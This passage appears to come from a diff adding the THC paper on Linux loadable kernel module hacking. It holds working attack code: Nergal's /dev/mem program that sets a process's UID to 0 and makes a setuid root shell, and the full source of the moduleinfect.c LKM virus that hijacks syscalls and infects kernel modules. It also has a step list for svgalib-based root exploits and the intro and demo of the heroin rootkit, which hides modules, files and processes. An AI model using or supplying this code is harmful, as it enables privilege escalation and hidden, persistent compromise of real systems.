+to write a file (just opcodes -> see me RET example) and inserting this file
+which would be harder to could but essier to map. For those who really want to
+understand the elf file handling I added Silvio Cesare's file to this text (I've
+also done it because Silvio Cesare wants his sources / ideas only be distributed
+within the whole file).<br>
+Now it's time to look at the general ideas of inserting LKMs on a system without
+support for that feature.<br>
+The first problem we are faced to if we want to insert code (a LKM or whatever)
+into the kernel is the need for memory. We can't take a random address and write
+our objectcode to /dev/kmem. So where can we put our code in a way it does not
+hurt the running system and will not be removed due to some memory operation in
+kernel space. There's one place where we can insert a bit of code, take a look
+at the following figure showing the general kernel memory :
+<xmp>
+ kernel data 
+ ...
+ kmalloc pool
+</xmp>
+The kmalloc pool is used for memory allocation in kernel space (kmalloc(...)).
+We cannot put our code into this pool because we cannot be sure that the address
+space we write to is unused. Now comes Silvio Cesare's idea : the kmalloc pool
+borders in memory are saved in memory_start and memory_end which are exported
+by the kernel (see /proc/ksyms). The interesting point about this is that the 
+start address (memory_start) is <i>not</i> exactly the kmalloc pool start adress, 
+because this address is aligned to the next page border of memory_start.So there
+is a bit of memory which will never be used (between memory_start and the real
+start of the kmalloc pool). This is the best place to insert our code. Ok this
+is not the whole story, you may recognize that no useful LKM will fit into this
+little buffer. Silvio Cesare used some bootstrap code he put into this little
+buffer; this code loads the actual LKM. This way we can load LKMs on systems
+without support for this. Please read Silvio Cesare's paper for a in-depth 
+discussion on actually mapping a LKM file (elf format) into the kernel; this
+is a bit difficult.
+
+<H3><A NAME="IV.3."></A>3. Last words</h3>
+
+Section 2 was nice, but what about systems which do not permit access to kmem?
+Well a last way would be inserting/modifying kernel space with the help of some
+kernel bugs. There are always some buffer overflows and other problems in kernel
+space. Also consider checking modules for some bugs. Just take a look at the many
+source files of the kernel. Even user space programs can help us to modify the
+kernel.<br>
+Bear in mind, that some weeks months ago a bug concerning svgalib was found. Every program
+using svgalib gets a handle with write permissions to /dev/mem. /dev/mem can also
+be used for RKP with the same adresses as /dev/kmem. So look at the following 
+list, to get some ideas how to do RKP on very secure systems :
+<ul>
+<li>find a program that uses svgalib<br>
+<li>check the source of that program for common buffer overflows (should be not
+too hard)
+<li>write an exploit which starts a program using the open /dev/mem write handle
+to manipulate the appropriate task structure to make your process UID 0
+<li>create a root shell
+</ul>
+This generic scheme works very fine (zgv, gnuplot or some know examples). For
+patching the task structure some people use the following program (which uses
+the open write handle) by Nergal :
+<XMP>
+/* by Nergal */
+#define SEEK_SET 0
+
+#define __KERNEL__
+#include <linux/sched.h>
+#undef __KERNEL__
+
+#define SIZEOF sizeof(struct task_struct)
+
+int mem_fd;
+int mypid;
+
+void
+testtask (unsigned int mem_offset)
+{
+  struct task_struct some_task;
+  int uid, pid;
+  lseek (mem_fd, mem_offset, SEEK_SET);
+  read (mem_fd, &some_task, SIZEOF);
+  if (some_task.pid == mypid)   /* is it our task_struct ? */
+    {
+      some_task.euid = 0;
+      some_task.fsuid = 0;      /* needed for chown */
+      lseek (mem_fd, mem_offset, SEEK_SET);
+      write (mem_fd, &some_task, SIZEOF);
+      /* from now on, there is no law beyond do what thou wilt */
+      chown ("/tmp/sh", 0, 0);
+      chmod ("/tmp/sh", 04755);
+      exit (0);
+    }
+}
+#define KSTAT 0x001a8fb8  /*  <-- replace this addr with that of your kstat */
+main ()                   /*      by doing strings /proc/ksyms |grep kstat  */
+{
+  unsigned int i;
+  struct task_struct *task[NR_TASKS];
+  unsigned int task_addr = KSTAT - NR_TASKS * 4;
+  mem_fd = 3;                   /* presumed to be opened /dev/mem */
+  mypid = getpid ();
+  lseek (mem_fd, task_addr, SEEK_SET);
+  read (mem_fd, task, NR_TASKS * 4);
+  for (i = 0; i < NR_TASKS; i++)
+    if (task[i])
+      testtask ((unsigned int)(task[i]));
+
+}
+</xmp>
+This was just an example to show you that there is always one way, you only have
+to find it. Systems with stack execution patches, you could look for heap
+overflows or just jump into some library functions (system(...)). There are thousand
+ways...<br>
+I hope this last section gave you some ideas how to proceed.
+
+
+<u><b>
+<H2>V. The near future : Kernel 2.2.x</H2>
+</u></b>
+<P><P>
+
+<H3><A NAME="V.1."></A>1. Main Difference for LKM writer's</h3>
+
+Linux has a new Kernel major Version 2.2 which brings some little changes to LKM
+coding. This part will help you to make the change, and outline the biggest
+changes. [Note : There will be another release concentrating on the new kernel]<br>
+I will show you some new macros / functions which will help you to develope
+LKMs for Kernel 2.2.  For an exact listing of every change take a look at the
+new Linux/module.h include file, which was totally rewritten for Kernel 2.1.18.
+First we will look at some macros which will help us to handle the System Table
+in an easier way :
+
+
+<TABLE border=5 width=100%>
+<tr>
+
+<th>macro</th>
+<th>description</th>
+
+<tr>
+<td>EXPORT_NO_SYMBOLS;</td>
+<td>this one is equal to register_symtab(NULL) for older kernel versions</td>
+</tr>
+
+<tr>
+<td>EXPORT_SYMTAB;</td>
+<td>this one must be defined before linux/module.h if you want to export some symbols</td>
+</tr>
+
+<tr>
+<td>EXPORT_SYMBOL(name);</td>
+<td>export the symbol named 'name'</td>
+</tr>
+
+<tr>
+<td>EXPORT_SYMBOL_NOVERS      
+ (name);</td>
+<td>export without version information</td>
+</tr>
+</table>
+
+The user space access functions were also changed a bit, so I will list them
+here (just include asm/uaccess.h to use them) :
+
+
+<TABLE border=5 width=100%>
+<tr>
+
+<th>function</th>
+<th>description</th>
+
+
+<tr>
+<td>int access_ok             
+(int type, unsigned long   
+addr, unsigned long size);</td>
+<td>this function checks whether the current process is allowed to access addr</td>
+</tr>
+
+<tr>
+<td>unsigned long             
+copy_from_user
+(unsigned long to,
+unsigned long from,
+unsigned long len);</td>
+<td>this is the 'new' memcpy_tofs function</td>
+</tr>
+
+<tr>
+<td>unsigned long             
+copy_to_user
+(unsigned long to,
+unsigned long from,
+unsigned long len);</td>
+<td>this is the counterpart of copy_from_user(...)</td>
+</tr>
+</table>
+
+You don't need to use access_ok(...) because the function listed above check
+this themselves.
+There are many more differences, but you should really take a look at linux/module.h
+for a detailed listing.<br>
+I want to mention one last thing. I wrote lots of stuff on the kerneldaemon
+(kerneld). Kernel 2.2 will not use kerneld any more. It uses another way of
+implementing the request_module(...) kernel space function - it's called <i>kmod</i>.
+kmod totally runs in kernel space (no IPC to user space any more). For LKM
+programmers nothing changes, you can still use the request_module(...) for
+loading modules. So the LKM infectors could use this also on kernel 2.2 systems.<br>
+I'm sorry about this little kernel 2.2 section, but at the moment I am working
+on a general paper on kernel 2.2 security (especially the lkm behaviour). So watch
+out for new THC releases. I even plan to work on some BSD systems (FreeBSD, OpenBSD,
+for example) but this will take some months. 
+
+
+
+<u><b>
+<H2>VI. Last Words</h2>
+</u></b>
+<P><P>
+
+<H3><A NAME="VI.1."></A>1. The 'LKM story' or 'how to make a system plug & hack compatible'</h3>
+
+You may wounder how insecure LKMs are and why they are used in such an insecure
+ways. Well LKMs are designed to make life easier especially for users.Linux fights
+agains Microsoft, so developers need a way to make the old unix style a bit more
+attractive and easier. They implement things like KDE and other nice things.
+Kerneld, for example, was developed in order to make module handling easier.
+But remember, the easier and more automated a system is the more problems
+concerning security are possible. It is <i>impossible</i> to make a system usable by
+everyone and being secure enough. Modules are a great example for this.<br>
+Microsoft shows us other examples : thinking of ActiveX, which is a (maybe) good
+idea, with a cruel securiy design for keeping everything simple.<br>
+So dear Linux developers : Be careful, and don't make the fault Microsoft made,
+don't create a plug & hack compatible OS. KEEP SECURITY IN MIND !<br>
+This text should also make clear that the kernel of any system must be protected
+in the best way available.It must be impossible for attackers to modify the most
+important item of your whole system. I leave this task to all system designers 
+out there :).
+
+<H3><A NAME="VI.2."></A>2. Links to other Resources</h3>
+
+Here are some interesting links about LKMs (not only hack & securiy related):<br>
+
+<b>[Internet]</b><br>
+
+<A HREF="http://www.linuxhq.com">http://www.linuxhq.com</A><br>
+everything on Linux + nice kernel links<br>
+<A HREF="http://www.linuxlinks.com">http://www.linuxlinks.com</a><br>
+lots of links concerning Linux<br>
+<A HREF="http://www.linux.org">http://www.linux.org</a><br>
+'propaganda' page for Linux<br>
+<A HREF="http://www.lwn.net">http://www.lwn.net</a><br>
+weekly Linux news; very interesting there are also kernel / securiy sections<br>
+<A HREF="http://www.phrack.com">http://www.phrack.com</a><br>
+read issue 50 & 52 for interesting module information<br>
+<A HREF="http://www.rootshell.com">http://www.rootshell.com</a><br>
+they have some nice LKMs<br>
+<A HREF="http://www.geek-girl.com/bugtraq/">http://www.geek-girl.com/bugtraq/</a><br>
+there were some discussions on LKM security<br>
+<A HREF="http://hispahack.ccc.de">http://hispahack.ccc.de</a><br>
+HISPAHACK homepage<br>
+<A HREF="http://www.thc.org">http://www.thc.org</a><br>
+THC homepage (articles, magazines and lots of tools)<br>
+<A HREF="http://www.antisearch.com">http://www.antisearch.com</a><br>
+one of the best security / hacking related search engines I know<br>
+<A HREF="http://www.kernel.org">http://www.kernel.org</a><br>
+get the kernel and study it !<br>
+<p>
+<b>[Books]</b><br>
+
+Linux-Kernel-Programming (Addison Wesley) <br>
+A very good book. I read the german version but I think there is also an english
+version.
+<p>
+Linux Device Drivers (O'Reilly)<br>  
+A bit off topic, but also very interesting. The focus is more on writing LKMs
+as device drivers.
+
+<H3><A NAME="Acknowledgements"></A>Acknowledgements</h3>
+
+<p>
+<u><b>Thanks for sources / ideas fly to :</u></b>
+<p>
+plaguez, Solar Designer, halflife, Michal Zalewski, Runar Jensen, Aleph1,
+Stealthf0rk/SVAT, FLoW/HISPAHACK, route, Andrew Tridgell, Silvio Cesare,
+daemon9, Nergal, van Hauser (especially for showing me some bugs) and those
+nameless individuals providing us with their ideas (there are so many) !
+
+
+<H3><A NAME="Greets"></A>Greets </h3>
+
+<u>groups</u>   : THC, deep, ech0, ADM, =phake=<br>
+<p>
+<u>personal</u> : 
+<dd>van Hauser   -   thanks for giving me the chance to learn </dd>
+<dd>mindmaniac   -   thanks for introducing 'the first contact'</dd>
+    
+                      
+<p>
+<p>
+background music groups (helping me to concentrate on writing :):<br> 
+<i>Neuroactive, Image Transmission, Panic on the Titanic, Dracul</i>
+
+<P><P><P><P>
+<HR SIZE="3" NOSHADE="NOSHADE">
+<P>
+<HR SIZE="3" NOSHADE="NOSHADE">
+<P><P><P><P>
+
+
+
+<u><b>
+<H2>A - Appendix</h2>
+</u></b>
+<P><P>
+
+
+Here you will find some sources.If the author of the LKM also published some
+notes / texts which are interesting, they will also be printed.<br>
+
+<H3><A NAME="A-a"></A>LKM Infector</h3>
+
+<b>NAME</b>            : moduleinfect.c<br>
+<b>AUTHOR</b>          : <A HREF="mailto:stealth@cyberspace.org">Stealthf0rk/SVAT <stealth@cyberspace.org></a><br>
+<b>DESCRIPTION</b>     : This is the first published LKM infector which was discussed                   
+                  II.8. This LKM has no destruction routine, it's just an
+                  infector, so experimenting should be quite harmless.<br>            
+<b>LINK</b>            : <A HREF="http://www.rootshell.com">http://www.rootshell.com</a><br>
+  
+<xmp>
+/* 		SVAT - Special Virii And Trojans - present:
+ *
+ * -=-=-=-=-=-=- the k0dy-projekt, virii phor unix systems -=-=-=-=-=-=-=-
+ *
+ * 0kay guys, here we go...
+ * As i told you with VLP I (we try to write an fast-infector)
+ * here's the result:
+ * a full, non-overwriting module infector that catches
+ * lkm's due to create_module() and infects them (max. 7)
+ * if someone calls delete_module() [even on autoclean].
+ * Linux is not longer a virii-secure system :(
+ * and BSD follows next week ...
+ * Since it is not needed 2 get root (by the module) you should pay
+ * attention on liane.
+ * Note the asm code in function init_module().
+ * U should assemble your /usr/src/.../module.c with -S and your CFLAG
+ * from your Makefile and look for the returnvalue from the first call
+ * of find_module() in sys_init_module(). look where its stored (%ebp for me)
+ * and change it in __asm__ init_module()! (but may it is not needed)
+ *
+ * For education only! 
+ * Run it only with permisson of the owner of the system you are logged on!!! 
+ * 
+ * 		!!! YOU USE THIS AT YOUR OWN RISK !!!
+ *
+ * I'm not responsible for any damage you may get due to playing around with this. 
+ *
+ * okay guys, you have to find out some steps without my help:
+ *
+ * 	1. $ cc -c -O2 module.c
+ *	2. get length of module.o and patch the #define MODLEN in module.c
+ *	3. $ ???
+ *   	4. $ cat /lib/modules/2.0.33/fs/fat.o >> module.o 
+ *	5. $ mv module.o /lib/modules/2.0.33/fs/fat.o
+ *	>AND NOW, IF YOU REALLY WANT TO START THE VIRUS:< 
+ *	6. $ insmod ???
+ * 
+ * This lkm-virus was tested on a RedHat 4.0 system with 80486-CPU and
+ * kernel 2.0.33. It works.
+ *
+ * 	greets  (in no order...)
+ * 	<><><><><><><><><><><><>
+ *
+ * 	NetW0rker	- tkx for da sources
+ *	Serialkiller	- gib mir mal deine eMail-addy
+ *	hyperSlash	- 1st SVAT member, he ?
+ *	naleZ 		- hehehe
+ *	MadMan		- NetW0rker wanted me to greet u !?
+ *	KilJaeden	- TurboDebugger and SoftIce are a good choice !
+ *
+ *	and all de otherz
+ *
+ *	Stealthf0rk/SVAT <stealth@cyberspace.org>
+ */
+
+#define __KERNEL__
+#define MODULE
+#define MODLEN 7104
+#define ENOUGH 7
+#define BEGIN_KMEM {unsigned long old_fs=get_fs();set_fs(get_ds());
+#define END_KMEM   set_fs(old_fs);}
+
+
+/* i'm not sure we need all of 'em ...*/
+
+#include <linux/version.h>
+#include <linux/mm.h>
+#include <linux/unistd.h>
+#include <linux/fs.h>
+#include <linux/types.h>
+#include <asm/errno.h>
+#include <asm/string.h>
+#include <linux/fcntl.h>
+#include <sys/syscall.h>
+#include <linux/module.h>
+#include <linux/malloc.h>
+#include <linux/kernel.h>
+#include <linux/kerneld.h>
+
+#define __NR_our_syscall 211
+#define MAXPATH 30
+/*#define DEBUG*/
+#ifdef DEBUG
+   #define DPRINTK(format, args...) printk(KERN_INFO format,##args)
+#else
+   #define DPRINTK(format, args...)
+#endif
+
+/* where the sys_calls are */
+
+extern void *sys_call_table[];
+
+/* tested only with kernel 2.0.33, but thiz should run under 2.x.x
+ * if you change the default_path[] values 
+ */
+
+static char *default_path[] = {
+	".", "/linux/modules",
+	"/lib/modules/2.0.33/fs",
+	"/lib/modules/2.0.33/net",
+	"/lib/modules/2.0.33/scsi",
+	"/lib/modules/2.0.33/block",
+	"/lib/modules/2.0.33/cdrom",
+	"/lib/modules/2.0.33/ipv4",
+	"/lib/modules/2.0.33/misc",
+	"/lib/modules/default/fs",
+	"/lib/modules/default/net",
+	"/lib/modules/default/scsi",
+	"/lib/modules/default/block",
+	"/lib/modules/default/cdrom",
+	"/lib/modules/default/ipv4",
+	"/lib/modules/default/misc",
+	"/lib/modules/fs",
+	"/lib/modules/net",
+	"/lib/modules/scsi",
+	"/lib/modules/block",
+	"/lib/modules/cdrom",
+	"/lib/modules/ipv4",
+	"/lib/modules/misc",
+	0
+};
+
+static struct symbol_table my_symtab = {
+   	#include <linux/symtab_begin.h>
+   	X(printk),
+        X(vmalloc),
+        X(vfree),
+        X(kerneld_send),
+        X(current_set),
+        X(sys_call_table),
+        X(register_symtab_from),
+        #include <linux/symtab_end.h>
+};
+
+char files2infect[7][60 + 2];
+
+/* const char kernel_version[] = UTS_RELEASE; */
+
+int (*old_create_module)(char*, int);
+int (*old_delete_module)(char *);
+int (*open)(char *, int, int);
+int (*close)(int);
+int (*unlink)(char*);
+
+int our_syscall(int);
+int infectfile(char *);
+int is_infected(char *);
+int cp(struct file*, struct file*);
+int writeVir(char *, char *);
+int init_module2(struct module*);
+char *get_mod_name(char*);
+
+/* needed to be global */
+
+void *VirCode = NULL;
+
+/* install new syscall to see if we are already in kmem */
+int our_syscall(int mn)
+{
+   	/* magic number: 40hex :-) */
+   	if (mn == 0x40)
+           	return 0;
+        else
+           	return -ENOSYS;
+}
+
+int new_create_module(char *name, int size)
+{
+   	int i = 0, j = 0, retval = 0;
+        
+        if ((retval = old_create_module(name, size)) < 0)
+           	return retval;
+        /* find next free place */
+        for (i = 0; files2infect[i][0] && i < 7; i++);
+        if (i == 6)
+           	return retval;
+        /* get name of mod from user-space */
+        while ((files2infect[i][j] = get_fs_byte(name + j)) != 0 && j < 60)
+           	j++;
+	DPRINTK("in new_create_module: got %s as #%d\n", files2infect[i], i);
+        return retval;
+}
+
+/* we infect modules after sys_delete_module, to be sure
+ * we don't confuse the kernel
+ */
+
+int new_delete_module(char *modname)
+{
+   	static int infected = 0;
+	int retval = 0, i = 0;
+        char *s = NULL, *name = NULL;
+        
+        
+        retval = old_delete_module(modname); 
+
+        if ((name = (char*)vmalloc(MAXPATH + 60 + 2)) == NULL)
+           	return retval;
+
+   	for (i = 0; files2infect[i][0] && i < 7; i++) {
+           	strcat(files2infect[i], ".o"); 
+                if ((s  = get_mod_name(files2infect[i])) == NULL) {
+                   	return retval;
+                }
+                name = strcpy(name, s);
+                if (!is_infected(name)) {
+                   	DPRINTK("try 2 infect %s as #%d\n", name, i);
+                        infected++;
+                        infectfile(name);
+                }
+                memset(files2infect[i], 0, 60 + 2);
+        } /* for */
+        /* its enough */
+        if (infected >= ENOUGH)
+           	cleanup_module();
+        vfree(name);
+        return retval;
+}
+
+
+/* lets take a look at sys_init_module(), that calls
+ * our init_module() compiled with
+ * CFLAG = ... -O2 -fomit-frame-pointer
+ * in C:
+ * ...
+ * if((mp = find_module(name)) == NULL)
+ * ...
+ *
+ * is in asm:
+ * ...
+ * call find_module
+ * movl %eax, %ebp
+ * ...
+ * note that there is no normal stack frame !!!
+ * thats the reason, why we find 'mp' (return from find_module) in %ebp
+ * BUT only when compiled with the fomit-frame-pointer option !!!
+ * with a stackframe (pushl %ebp; movl %esp, %ebp; subl $124, %esp)
+ * you should find mp at -4(%ebp) .
+ * thiz is very bad hijacking of local vars and an own topic.
+ * I hope you do not get an seg. fault.
+ */
+
+__asm__ 
+("
+
+.align 16
+.globl init_module	
+   .type init_module,@function
+
+init_module:
+        pushl %ebp		 /* ebp is a pointer to mp from sys_init_module() */
+                        	 /* and the parameter for init_module2() */
+        call init_module2    	 
+        popl %eax
+        xorl %eax, %eax		 /* all good */
+        ret	                 /* and return */
+.hype27:
+   	.size init_module,.hype27-init_module
+");
+        
+ /* for the one with no -fomit-frame-pointer and no -O2 this should (!) work:
+  *
+  * pushl %ebx
+  * movl %ebp, %ebx
+  * pushl -4(%ebx)
+  * call init_module2
+  * addl $4, %esp
+  * xorl %eax, %eax
+  * popl %ebx
+  * ret
+  */
+
+/*----------------------------------------------*/
+
+int init_module2(struct module *mp)
+{       
+        char *s = NULL, *mod = NULL, *modname = NULL;
+        long state = 0;
+   
+      	mod = vmalloc(60 + 2);
+	modname = vmalloc(MAXPATH + 60 + 2);
+        if (!mod || !modname)
+           	return -1;        
+        strcpy(mod, mp->name);
+        strcat(mod, ".o");
+
+   	
+        MOD_INC_USE_COUNT;        
+        DPRINTK("in init_module2: mod = %s\n", mod);
+        
+        /* take also a look at phrack#52 ...*/
+        mp->name = "";
+        mp->ref = 0;
+        mp->size = 0;
+
+        /* thiz is our new main ,look for copys in kmem ! */
+        if (sys_call_table[__NR_our_syscall] == 0) {    
+		old_delete_module = sys_call_table[__NR_delete_module];  
+                old_create_module = sys_call_table[__NR_create_module];
+                sys_call_table[__NR_our_syscall] = (void*)our_syscall;  		
+                sys_call_table[__NR_delete_module] = (void*)new_delete_module;         
+                sys_call_table[__NR_create_module] = (void*)new_create_module;
+                memset(files2infect, 0, (60 + 2)*7);
+                register_symtab(&my_symtab);
+        }
+        open = sys_call_table[__NR_open]; 
+        close = sys_call_table[__NR_close];        
+        unlink = sys_call_table[__NR_unlink];        
+        
+        if ((s = get_mod_name(mod)) == NULL)
+           	return -1;
+        modname = strcpy(modname, s);
+	load_real_mod(modname, mod);
+	vfree(mod);
+        vfree(modname);
+	return 0;
+}        
+
+int cleanup_module()
+{
+	sys_call_table[__NR_delete_module] = old_delete_module;
+        sys_call_table[__NR_create_module] = old_create_module;
+        sys_call_table[__NR_our_syscall] = NULL;
+        DPRINTK("in cleanup_module\n");
+        vfree(VirCode);
+        return 0;
+}
+
+/* returns 1 if infected; 
+ * seek at position MODLEN + 1 and read out 3 bytes,
+ * if it is "ELF" it seems the file is already infected
+ */
+
+int is_infected(char *filename) 
+{
+   	char det[4] = {0};
+        int fd = 0;
+        struct file *file;
+
+        DPRINTK("in is_infected: filename = %s\n", filename);
+   	BEGIN_KMEM
+        fd = open(filename, O_RDONLY, 0); 
+        END_KMEM
+        if (fd <= 0)
+           	return -1;
+        if ((file = current->files->fd[fd]) == NULL)
+           	return -2;
+        file->f_pos = MODLEN + 1;
+        DPRINTK("in is_infected: file->f_pos = %d\n", file->f_pos);
+        BEGIN_KMEM
+        file->f_op->read(file->f_inode, file, det, 3);
+        close(fd);
+        END_KMEM
+        DPRINTK("in is_infected: det = %s\n", det);
+        if (strcmp(det, "ELF") == 0)
+           	return 1;
+        else
+           	return 0;
+}
+
+/* copy the host-module to tmp, write VirCode to
+ * hostmodule, and append tmp.
+ * then delete tmp.
+ */
+
+
+int infectfile(char *filename)
+{
+        char *tmp = "/tmp/t000";
+        int in = 0, out = 0;
+        struct file *file1, *file2;
+        
+        BEGIN_KMEM
+        in = open(filename, O_RDONLY, 0640);
+        out = open(tmp, O_RDWR|O_TRUNC|O_CREAT, 0640);
+        END_KMEM
+        DPRINTK("in infectfile: in = %d out = %d\n", in, out);
+        if (in <= 0 || out <= 0)
+           	return -1;
+        file1 = current->files->fd[in];
+        file2 = current->files->fd[out];
+        if (!file1 || !file2)
+           	return -1;
+        /* save hostcode */
+        cp(file1, file2);
+        BEGIN_KMEM
+        file1->f_pos = 0;
+        file2->f_pos = 0;
+        /* write Vircode [from mem] */
+        DPRINTK("in infetcfile: filenanme = %s\n", filename);
+        file1->f_op->write(file1->f_inode, file1, VirCode, MODLEN);
+        /* append hostcode */
+        cp(file2, file1);
+        close(in);
+        close(out);
+        unlink(tmp);
+        END_KMEM
+   	return 0;
+}        
+
+int disinfect(char *filename)
+{
+
+	char *tmp = "/tmp/t000";
+        int in = 0, out = 0;
+        struct file *file1, *file2;
+        
+        BEGIN_KMEM
+        in = open(filename, O_RDONLY, 0640);
+        out = open(tmp, O_RDWR|O_TRUNC|O_CREAT, 0640);
+        END_KMEM
+        DPRINTK("in disinfect: in = %d out = %d\n",in, out);
+        if (in <= 0 || out <= 0)
+           	return -1;
+        file1 = current->files->fd[in];
+        file2 = current->files->fd[out];
+        if (!file1 || !file2)
+           	return -1;
+        /* save hostcode */
+        cp(file1, file2);
+	BEGIN_KMEM
+ 	close(in);
+        DPRINTK("in disinfect: filename = %s\n", filename); 
+        unlink(filename);
+	in = open(filename, O_RDWR|O_CREAT, 0640);
+	END_KMEM
+	if (in <= 0)
+		return -1;
+	file1 = current->files->fd[in];
+	if (!file1)
+           	return -1;
+        file2->f_pos = MODLEN;
+	cp(file2, file1);
+	BEGIN_KMEM
+	close(in);
+	close(out);
+	unlink(tmp);
+	END_KMEM
+	return 0;
+}
+
+/* a simple copy routine, that expects the file struct pointer
+ * of the files to be copied.
+ * So its possible to append files due to copieng.
+ */
+
+int cp(struct file *file1, struct file *file2)
+{
+
+   	int in = 0, out = 0, r = 0;
+        char *buf;
+        
+        if ((buf = (char*)vmalloc(10000)) == NULL)
+           	return -1;
+
+        DPRINTK("in cp: f_pos = %d\n", file1->f_pos);
+        BEGIN_KMEM
+        while ((r = file1->f_op->read(file1->f_inode, file1, buf, 10000)) > 0)
+           	file2->f_op->write(file2->f_inode, file2, buf, r);
+        file2->f_inode->i_mode = file1->f_inode->i_mode;
+        file2->f_inode->i_atime = file1->f_inode->i_atime;
+        file2->f_inode->i_mtime = file1->f_inode->i_mtime;
+        file2->f_inode->i_ctime = file1->f_inode->i_ctime;
+        END_KMEM
+        vfree(buf);
+        return 0;
+}
+
+/* Is that simple: we disinfect the module [hide 'n seek]
+ * and send a request to kerneld to load
+ * the orig mod. N0 fuckin' parsing for symbols and headers
+ * is needed - cool.
+ */
+int load_real_mod(char *path_name, char *name)
+{   	
+        int r = 0, i = 0;		
+        struct file *file1, *file2;
+        int in =  0, out = 0; 
+
+        DPRINTK("in load_real_mod name = %s\n", path_name);
+        if (VirCode)
+           	vfree(VirCode);
+        VirCode = vmalloc(MODLEN);
+        if (!VirCode)
+                return -1;
+        BEGIN_KMEM
+        in = open(path_name, O_RDONLY, 0640);
+        END_KMEM
+	if (in <= 0)
+           	return -1;
+        file1 = current->files->fd[in];
+        if (!file1)
+              	return -1;
+        /* read Vircode [into mem] */
+	BEGIN_KMEM
+        file1->f_op->read(file1->f_inode, file1, VirCode, MODLEN);
+	close(in);
+	END_KMEM
+	disinfect(path_name);
+        r = request_module(name);
+        DPRINTK("in load_real_mod: request_module = %d\n", r);
+        return 0;
+}   	
+        
+char *get_mod_name(char *mod)
+{
+	int fd = 0, i = 0;
+	static char* modname = NULL;
+	
+	if (!modname)
+		modname = vmalloc(MAXPATH + 60 + 2);
+	if (!modname)
+		return NULL;
+	BEGIN_KMEM
+        for (i = 0; (default_path[i] && (strstr(mod, "/") == NULL)); i++) {
+		memset(modname, 0, MAXPATH + 60 + 2);
+		modname = strcpy(modname, default_path[i]);
+		modname = strcat(modname, "/");
+                modname = strcat(modname, mod);
+		if ((fd = open(modname, O_RDONLY, 0640)) > 0) 
+			break;
+        }
+        close(fd);
+        END_KMEM    
+        if (!default_path[i])
+           	return NULL;  
+	return modname;	
+}        
+
+</xmp>
+
+<H3><A NAME="A-b"></A>Herion - the classic one</h3>
+
+
+<b>NAME</b>            : Heroin<br>
+<b>AUTHOR</b>          : <A HREF="mailto:zarq@opaque.org">Runar Jensen</a><br>
+<b>DESCRIPTION</b>     : Runar Jensen introduced some nice ideas in his text, which
+                  were the first steps towards our modern Hide LKM by plaguez.
+                  The way Runar Jensen hides the module requires more coder work
+                  than the plaguez (Solar Designer and other people) approach,
+                  but it works. The way Runar Jensen hides processes is also a
+                  bit too complicated (well this text is quite old, and it was
+                  one of the first talking about LKM hacking), He uses a special
+                  signal code (31) in order to set a flag in a process structure
+                  which indicates that this process is going to be hidden, in
+                  the way we discussed in part II. <br>
+                  The rest should be clear.            <br>        
+<b>LINK</b>            : <A HREF="http://www.rootshell.com">http://www.rootshell.com</a><br>
+  
+<xmp>
+As halflife demonstrated in Phrack 50 with his linspy project, it is trivial
+to patch any systemcall under Linux from within a module. This means that
+once your system has been compromised at the root level, it is possible for
+an intruder to hide completely _without_ modifying any binaries or leaving
+any visible backdoors behind. Because such tools are likely to be in use
+within the hacker community already, I decided to publish a piece of code to
+demonstrate the potentials of a malicious module.
+
+The following piece of code is a fully working Linux module for 2.1 kernels
+that patches the getdents(), kill(), read() and query_module() calls. Once
+loaded, the module becomes invisible to lsmod and a dump of /proc/modules by
+modifying the output of every query_module() call and every read() call
+accessing /proc/modules. Apparently rmmod also calls query_module() to list
+all modules before attempting to remove the specified module, and will
+therefore claim that the module does not exist even if you know its name. The
+output of any getdents() call is modified to hide any files or directories
+starting with a given string, leaving them accessible only if you know their
+exact names. It also hides any directories in /proc matching pids that have a
+specified flag set in its internal task structure, allowing a user with root
+access to hide any process (and its children, since the task structure is
+duplicated when the process does a fork()). To set this flag, simply send the
+process a signal 31 which is caught and handled by the patched kill() call.
+
+To demonstrate the effects...
+
+[root@image:~/test]# ls -l
+total 3
+-rw-------   1 root     root         2832 Oct  8 16:52 heroin.o
+[root@image:~/test]# insmod heroin.o
+[root@image:~/test]# lsmod | grep heroin
+[root@image:~/test]# grep heroin /proc/modules
+[root@image:~/test]# rmmod heroin
+rmmod: module heroin not loaded
+[root@image:~/test]# ls -l
+total 0
+[root@image:~/test]# echo "I'm invisible" > heroin_test
+[root@image:~/test]# ls -l
+total 0
+[root@image:~/test]# cat heroin_test
+I'm invisible
+[root@image:~/test]# ps -aux | grep gpm
+root       223  0.0  1.0   932   312  ?  S   16:08   0:00 gpm
+[root@image:~/test]# kill -31 223
+[root@image:~/test]# ps -aux | grep gpm
+[root@image:~/test]# ps -aux 223
+USER       PID %CPU %MEM  SIZE   RSS TTY STAT START   TIME COMMAND
+root       223  0.0  1.0   932   312  ?  S   16:08   0:00 gpm
+[root@image:~/test]# ls -l /proc | grep 223
+[root@image:~/test]# ls -l /proc/223
+total 0
+-r--r--r--   1 root     root            0 Oct  8 16:53 cmdline
+lrwx------   1 root     root            0 Oct  8 16:54 cwd -> /var/run
+-r--------   1 root     root            0 Oct  8 16:54 environ
+lrwx------   1 root     root            0 Oct  8 16:54 exe -> /usr/bin/gpm
+dr-x------   1 root     root            0 Oct  8 16:54 fd
+pr--r--r--   1 root     root            0 Oct  8 16:54 maps
+-rw-------   1 root     root            0 Oct  8 16:54 mem
+lrwx------   1 root     root            0 Oct  8 16:54 root -> /
+-r--r--r--   1 root     root            0 Oct  8 16:53 stat
+-r--r--r--   1 root     root            0 Oct  8 16:54 statm
+-r--r--r--   1 root     root            0 Oct  8 16:54 status
+[root@image:~/test]#
+
+The implications should be obvious. Once a compromise has taken place,
+nothing can be trusted, the operating system included. A module such as this
+could be placed in /lib/modules/<kernel_ver>/default to force it to be loaded
+after every reboot, or put in place of a commonly used module and in turn
+have it load the required module for an added level of protection. (Thanks
+Sean :) Combined with a reasonably obscure remote backdoor it could remain
+undetected for long periods of time unless the system administrator knows
+what to look for. It could even hide the packets going to and from this
+backdoor from the kernel itself to prevent a local packet sniffer from seeing
+them.
+
+So how can it be detected? In this case, since the number of processes is
+limited, one could try to open every possible process directory in /proc and
+look for the ones that do not show up otherwise. Using readdir() instead of
+getdents() will not work, since it appears to be just a wrapper for
+getdents(). In short, trying to locate something like this without knowing
+exactly what to look for is rather futile if done in userspace...
+
+Be afraid. Be very afraid. ;)
+
+.../ru
+
+-----
+
+/*
+ * heroin.c
+ *
+ * Runar Jensen <zarq@opaque.org>
+ *
+ * This Linux kernel module patches the getdents(), kill(), read()
+ * and query_module() system calls to demonstrate the potential
+ * dangers of the way modules have full access to the entire kernel.
+ *
